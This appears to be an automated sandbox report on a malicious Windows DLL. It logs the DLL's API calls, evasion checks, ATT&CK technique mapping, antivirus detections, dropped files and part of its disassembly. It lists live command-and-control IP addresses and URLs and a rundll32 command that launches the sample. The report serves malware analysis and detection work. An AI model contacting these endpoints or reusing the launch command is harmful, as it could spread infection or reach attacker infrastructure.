                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10011BF0 push eax; ret 2_2_10011C0E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001254F push ecx; ret 2_2_1001255F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001254F push ecx; ret 3_2_1001255F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10010B20 push eax; ret 3_2_10010B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10010B20 push eax; ret 3_2_10010B5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10011BF0 push eax; ret 3_2_10011C0E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10025CEC __EH_prolog,LoadLibraryA,GetProcAddress,2_2_10025CEC
                      Source: C:\Windows\SysWOW64\regsvr32.exePE file moved: C:\Windows\SysWOW64\Bvqee\qeggfkimakwygr.cheJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\regsvr32.exe File opened: C:\Windows\SysWOW64\Bvqee\qeggfkimakwygr.che:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Urxuhfwuvdoqo\fwicd.dee:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Fwtalcmqgixd\btngtvbvsro.wfo:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10007AE5 IsIconic,GetWindowPlacement,GetWindowRect,2_2_10007AE5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10007AE5 IsIconic,GetWindowPlacement,GetWindowRect,3_2_10007AE5
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6164 Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6524 Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6228 Thread sleep time: -120000s >= -30000s
                      Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-16333
                      Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 2.8 %
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.6 %
                      Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10010839 VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,2_2_10010839
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,2_2_1002592C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,3_2_1002592C
                      Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-16334
                      Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-22388
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: svchost.exe, 00000018.00000002.684176363.000002554AE70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                      Source: regsvr32.exe, 00000005.00000003.526469173.0000000003338000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.481292465.0000000003338000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.538611722.0000000003338000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.953956932.0000000003338000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.836818432.000001958604C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.836852130.0000019586062000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.684378033.000002554AEEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000000D.00000002.836363112.000001958082A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@P
                      Source: svchost.exe, 0000000E.00000002.953778088.000002243AA02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 0000000E.00000002.953865417.000002243AA28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: regsvr32.exe, 00000005.00000003.526469173.0000000003338000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.481292465.0000000003338000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.538611722.0000000003338000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.953956932.0000000003338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWd
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10005260 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,memcpy,2_2_10005260
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10016DD6 SetUnhandledExceptionFilter,3_2_10016DD6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10016DEA SetUnhandledExceptionFilter,3_2_10016DEA

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 217.182.25.250 8080Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 70.36.102.35 443Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 51.91.76.89 8080Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 119.193.124.41 7080Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 92.240.254.110 8080Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP (2_2_10001090)
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: lstrcpyA,LoadLibraryA,GetLocaleInfoA (2_2_100348C4)
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoA (2_2_1001A444)
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetThreadLocale,GetLocaleInfoA,GetACP (3_2_10001090)
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA (3_2_1001A444)
                      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: lstrcpyA,LoadLibraryA,GetLocaleInfoA (3_2_100348C4)
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_10011075 GetSystemTimeAsFileTime,__aulldiv
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_10018E14 __lock,_strlen,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy
                      Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_10001100 GetVersionExA,InterlockedExchange

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 2.2.regsvr32.exe.49b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.rundll32.exe.4290000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.regsvr32.exe.4c70000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.regsvr32.exe.4c70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.3110000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.rundll32.exe.42c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.3110000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.regsvr32.exe.49e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.regsvr32.exe.49b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.regsvr32.exe.4d70000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 3.2.rundll32.exe.49f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.rundll32.exe.4290000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000002.440856153.00000000049E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.438019180.00000000049F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.440822056.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.438281451.0000000004290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.954167693.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.438313364.00000000042C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.954213063.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000003.00000002.437810837.0000000003110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | 2 Native API | 1 DLL Side-Loading | 111 Process Injection | 2 Masquerading | 1 Input Capture | 2 System Time Discovery | Remote Services | 1 Input Capture | Exfiltration Over Other Network Medium | 12 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 3 Virtualization/Sandbox Evasion | LSASS Memory | 31 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 1 Non-Standard Port | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | Security Account Manager | 3 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 11 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Hidden Files and Directories | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Obfuscated Files or Information | Cached Domain Credentials | 1 Remote System Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Regsvr32 | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 36 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 File Deletion | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
                      Behavior Graph: ID: 669370, Sample: 9818t9ks1s, Startdate: 20/07/2022, Architecture: WINDOWS, Score: 100

                      Source | Detection | Scanner | Label
                      9818t9ks1s.dll | 70% | Virustotal |
                      9818t9ks1s.dll | 100% | Avira | TR/AD.Nekark.bnwrm
                      9818t9ks1s.dll | 100% | Joe Sandbox ML |
                      No Antivirus matches
                      Source | Detection | Scanner | Label
                      2.2.regsvr32.exe.49b0000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
                      4.2.rundll32.exe.4290000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
                      5.2.regsvr32.exe.4c70000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
                      5.2.regsvr32.exe.4d70000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      2.2.regsvr32.exe.49e0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      4.2.rundll32.exe.42c0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      3.2.rundll32.exe.49f0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      3.2.rundll32.exe.3110000.0.unpack | 100% | Avira | HEUR/AGEN.1215461
                      No Antivirus matches
                      Source | Detection | Scanner | Label
                      https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
                      https://70.36.102.35/v | 100% | Avira URL Cloud | malware
                      https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
                      https://70.36.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQdF | 100% | Avira URL Cloud | malware
                      https://70.36.102.35/ | 14% | Virustotal |
                      https://70.36.102.35/ | 100% | Avira URL Cloud | malware
                      https://www.pango.co/privacy | 0% | URL Reputation | safe
                      https://disneyplus.com/legal. | 0% | URL Reputation | safe
                      http://crl.ver) | 0% | Avira URL Cloud | safe
                      https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
                      https://70.36.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQdT | 100% | Avira URL Cloud | malware
                      http://schemas.dmtf.o | 0% | Avira URL Cloud | safe
                      https://92.240.254.110:8080/gECMlLDhVoiKFtzKjjRUPjlZHZhhxfpHLqiKeXIlMdFcRqaPxeg | 0% | Avira URL Cloud | safe
                      https://92.240.254.110/6.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQd | 0% | Avira URL Cloud | safe
                      https://92.240.254.110/ | 0% | Avira URL Cloud | safe
                      http://help.disneyplus.com. | 0% | URL Reputation | safe
                      https://70.36.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQd | 100% | Avira URL Cloud | malware
                      No contacted domains info
                              36351SOFTLAYERUStrue
                              92.240.254.110
                              unknownSlovakia (SLOVAK Republic)
                              42005LIGHTSTORM-COMMUNICATIONS-SRO-SK-ASPeeringsSKtrue
                              IP
                              192.168.2.1
                              127.0.0.1
                              Joe Sandbox Version:35.0.0 Citrine
                              Analysis ID:669370
                              Start date and time:2022-07-20 01:05:10 +02:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 12m 23s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:9818t9ks1s (renamed file extension from none to dll)
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:26
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.evad.winDLL@19/5@0/58
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 99.8% (good quality ratio 97.2%)
                              • Quality average: 84.5%
                              • Quality standard deviation: 23.7%
                              HCA Information:
                              • Successful, ratio: 94%
                              • Number of executed functions: 31
                              • Number of non-executed functions: 281
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Override analysis time to 240s for rundll32
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                              • Excluded IPs from analysis (whitelisted): 20.106.86.13, 23.205.181.161, 13.71.55.58, 23.211.4.86, 20.223.24.244
                              • Excluded domains from analysis (whitelisted): fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, settings-prod-cin-2.centralindia.cloudapp.azure.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, settings-prod-wus3-1.westus3.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, e1723.g.akamaiedge.net, atm-settingsfe-prod-weighted.trafficmanager.net, ris.api.iris.microsoft.com, licensing.mp.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                              • Not all processes were analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              Time | Type | Description
                              01:06:51 | API Interceptor | 11x Sleep call for process: svchost.exe modified
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8192
                                                                      Entropy (8bit):0.3593198815979092
                                                                      Encrypted:false
                                                                      SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                      MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                      SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                      SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                      SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                      Malicious:false
                                                                      Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:MPEG-4 LOAS
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.24943716309551126
                                                                      Encrypted:false
                                                                      SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU49:BJiRdwfu2SRU49
                                                                      MD5:00654427E58616B58C62FC50C2B52CAE
                                                                      SHA1:FAE33CDA4A87AE87F8C54F629D947A73C0F3D752
                                                                      SHA-256:03367E7F1FBA65E7384C510DBEF162E503A7499F98E712C23D2A4990677EBACD
                                                                      SHA-512:50B9C51F0154E0AC12BFE61392E0295E5B70A93338AE526C115E018FE46A93596226C4B2A0BD74C2B254883E93F1CC2A7BFF900D505722DC7CB765E1B5EF9A2D
                                                                      Malicious:false
                                                                      Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x31ef495f, page size 16384, Windows version 10.0
                                                                      Category:dropped
                                                                      Size (bytes):786432
                                                                      Entropy (8bit):0.25054036977537886
                                                                      Encrypted:false
                                                                      SSDEEP:384:7jM+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:7jTSB2nSB2RSjlK/+mLesOj1J2
                                                                      MD5:F449C6D8DF10E7E1F61BDD97A6494F87
                                                                      SHA1:CE664D962FF28C7AD92580FEAB4E450998815495
                                                                      SHA-256:5928D3F1531BDD70D74FF76EEF2344721E7398CC22D3F203F09CBEDD149DE78A
                                                                      SHA-512:5B77117B0644DAB36AC90631921320E6B5978D08E4D7B852E212F6E89335E7021068E8570BF8E777941328E3B4E1511AF61F99DD07D633BB8195149C484955B9
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):0.07303587911152667
                                                                      Encrypted:false
                                                                      SSDEEP:3:R4HR7vWMoximlll/tksjibD1tHlllall3Vkttlmlnl:grW/iWMwibD1tfA3
                                                                      MD5:F2E666170C5999D5002A645DC8634D6E
                                                                      SHA1:20FFA1FAF1479110694542B7972C3F5155A9BED6
                                                                      SHA-256:57FB4BC8D3FFC4201342D81B07349EA6BC5728AFB0C4213E52AC91FB781D2E1E
                                                                      SHA-512:331576024162E4BBD3517803D81CEC60A8A12D1DED59E31B50FCA8DCC2D0721EE075955591EF0116383F3188729105F45E65CE4F376610963ECDA11978181B6B
                                                                      Malicious:false
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):55
                                                                      Entropy (8bit):4.306461250274409
                                                                      Encrypted:false
                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                      Malicious:false
                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.352826845434315
                                                                      TrID:
                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 98.32%
                                                                      • Windows Screen Saver (13104/52) 1.29%
                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:9818t9ks1s.dll
                                                                      File size:655360
                                                                      MD5:83418a9af56db91ff2c78c4b2b9d62f8
                                                                      SHA1:0ea68aab3721e509ce0b1bff7e574eda037798be
                                                                      SHA256:4a688f571024b08f9793559427d8692471f5aa715882899c631c3052eac7c6a1
                                                                      SHA512:dadfeea6c52deda79860158036b60c54e907483b3f317e270d44e5949db169f4a26e748956654d914a3c9dda52c264e2c79bc0073254d9e58c62d9b5e69205a2
                                                                      SSDEEP:6144:/6ZMFXzqfoSHr/mvcQYbi2HN8C8BgifO7y7TcuVqrWLWN7Ypsi6Ih9vH0/oUHahE:/8MFX47ivcQMNsrD4KJjO69cI
                                                                      TLSH:06D47C0EFFD1C1B2D36B123019D5C64823ADBF2CEAA1C5B777A8BE1D69326C14512B16
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..0m..cm..cm..c...cg..c...ck..c~..co..c...c|..cm..c@..ch..cq..ch..c...cF..cd..ch..c...ch..cl..c...cl..ch..cl..cRichm..c.......
                                                                      Icon Hash:c0cc4c687ccccc78
                                                                      Entrypoint:0x1001131c
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x10000000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                                                                      DLL Characteristics:
                                                                      Time Stamp:0x623CFB7E [Thu Mar 24 23:15:10 2022 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:d63ab94f4bb6b5d2f0f6092bf07e00ac
                                                                      Instruction
                                                                      push 0000000Ch
                                                                      push 10041D40h
                                                                      call 00007FB05074AA61h
                                                                      xor eax, eax
                                                                      inc eax
                                                                      mov dword ptr [ebp-1Ch], eax
                                                                      mov esi, dword ptr [ebp+0Ch]
                                                                      xor edi, edi
                                                                      cmp esi, edi
                                                                      jne 00007FB05074987Eh
                                                                      cmp dword ptr [1004F3C8h], edi
                                                                      je 00007FB050749929h
                                                                      mov dword ptr [ebp-04h], edi
                                                                      cmp esi, eax
                                                                      je 00007FB050749877h
                                                                      cmp esi, 02h
                                                                      jne 00007FB0507498A3h
                                                                      mov eax, dword ptr [10050CB4h]
                                                                      cmp eax, edi
                                                                      je 00007FB05074987Eh
                                                                      push dword ptr [ebp+10h]
                                                                      push esi
                                                                      push dword ptr [ebp+08h]
                                                                      call eax
                                                                      mov dword ptr [ebp-1Ch], eax
                                                                      cmp dword ptr [ebp-1Ch], edi
                                                                      je 00007FB0507498FBh
                                                                      push dword ptr [ebp+10h]
                                                                      push esi
                                                                      push dword ptr [ebp+08h]
                                                                      call 00007FB050749697h
                                                                      mov dword ptr [ebp-1Ch], eax
                                                                      cmp eax, edi
                                                                      je 00007FB0507498E4h
                                                                      mov ebx, dword ptr [ebp+10h]
                                                                      push ebx
                                                                      push esi
                                                                      push dword ptr [ebp+08h]
                                                                      call 00007FB05073E608h
                                                                      mov dword ptr [ebp-1Ch], eax
                                                                      cmp esi, 01h
                                                                      jne 00007FB050749880h
                                                                      cmp eax, edi
                                                                      jne 00007FB05074987Ch
                                                                      push ebx
                                                                      push edi
                                                                      push dword ptr [ebp+08h]
                                                                      call 00007FB05074966Dh
                                                                      cmp esi, edi
